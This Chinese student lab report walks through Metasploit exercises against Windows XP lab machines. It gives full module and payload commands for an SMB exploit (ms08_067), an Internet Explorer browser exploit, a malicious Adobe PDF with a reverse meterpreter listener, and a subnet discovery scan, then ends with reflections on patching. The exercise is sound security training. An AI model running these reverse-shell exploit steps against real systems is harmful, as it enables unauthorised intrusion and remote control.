一、实践内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.一个主动攻击实践,如ms08_067; (成功)
2.一个针对浏览器的攻击,如ms10_018_ie_behaviors;(成功且唯一)
3. 一个针对客户端的攻击,如Adobe;(成功)
4.成功应用任何一个辅助模块。(成功)
二、实践过程
1.实现主动攻击,使用ms08_067漏洞
被攻击机:WindowsXP sp3.
(1)输入指令使用ms08_067漏洞攻击程序 use exploit/windows/smb/ms08_067_netapi
(2)配置参数
输入指令 set payload generic/shell_reverse_tcp(设置有效攻击载荷)
设置攻击机ip set LHOST 192.168.1.234
设置攻击端口 set LPORT 4303
设置靶机ip set RHOST 192.168.1.229
设置自动选择目标系统类型 set target 10
(3)设置完成后输入指令 exploit,可以看到,已经获得了xp的权限
2.实现针对浏览器的攻击,使用ms10_002漏洞
被攻击环境:WindowsXP sp2+ie 6.0
(1)使用指令 use exploit/windows/browser/ms10_018_ie_behaviors
选择一个payload set payloads windows/meterpreter/reverse_tcp
设置相关参数,
set LHOST 192.168.1.234攻击方IP;
set LPORT 4303 攻击方端口;
set target 0
set URIPATH 4303js 资源标识符路径设置;
(3)输入指令 exploit 后,可以看到生成了名为http://192.168.1.234:8080/4303js 的链接
(4)在xp系统里访问链接 http://192.168.1.234:8080/4303js,此时IE卡死,崩溃
(5)输入指令 sessions -i 1 后,成功获取到xp的cmd
3.实现针对客户端的攻击
被攻击环境:WindowsXP sp2+Adobe Readers 9.0
(1)输入指令 use windows/fileformat/adobe_cooltype_sing
(2)配置渗透攻击所需的配置项:
设置载荷: set payload windows/meterpreter/reverse_tcp
设置攻击机IP: set LHOST 192。168.1.234
设置端口: set LPORT 4303
设置产生的文件: set FILENAME 4303.pdf
设置完成后键入 exploit
(3)根据路径找到该pdf文件放到靶机里。(需要先设置,勾选显示隐藏文件,再进行寻找)
(4)使用命令 back 退出当前模块,启动一个对应于载荷的监听端,等待靶机回连
输入指令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.234
set lport
(5)在靶机中打开该pdf,回连成功
4 成功应用任何一个辅助模块。
使用ARP请求枚举本地局域网中所有活跃主机
输入指令: use auxiliary/scanner/discovery/udp_seep
show options
将RHOSTS设置为 192.168.1.0/24,即扫描子网号为192.168.1.0的子网内的所有主机
可以看到目标主机的IP192.168.1.168在列表之中。
三、基础问题回答
用自己的话解释什么是exploit,payload,encode.
exploit就是执行攻击程序,利用漏洞对靶机进行相应的攻击;payload就是漏洞攻击的有效载荷,利用漏洞实现不同的攻击手段;encode就是编码器,就是对攻击进行伪装。
四、实验总结与体会
这次实验我认为主要看网,网不好虚拟机都下不下来。msf的功能固然强大,但攻击成功的前提是被攻击的主机存在我们需要的漏洞。如果我们能够重视计算机安全的保护,及时对软件和系统进行更新,修补漏洞,我们的电脑收到攻击的可能性会很低。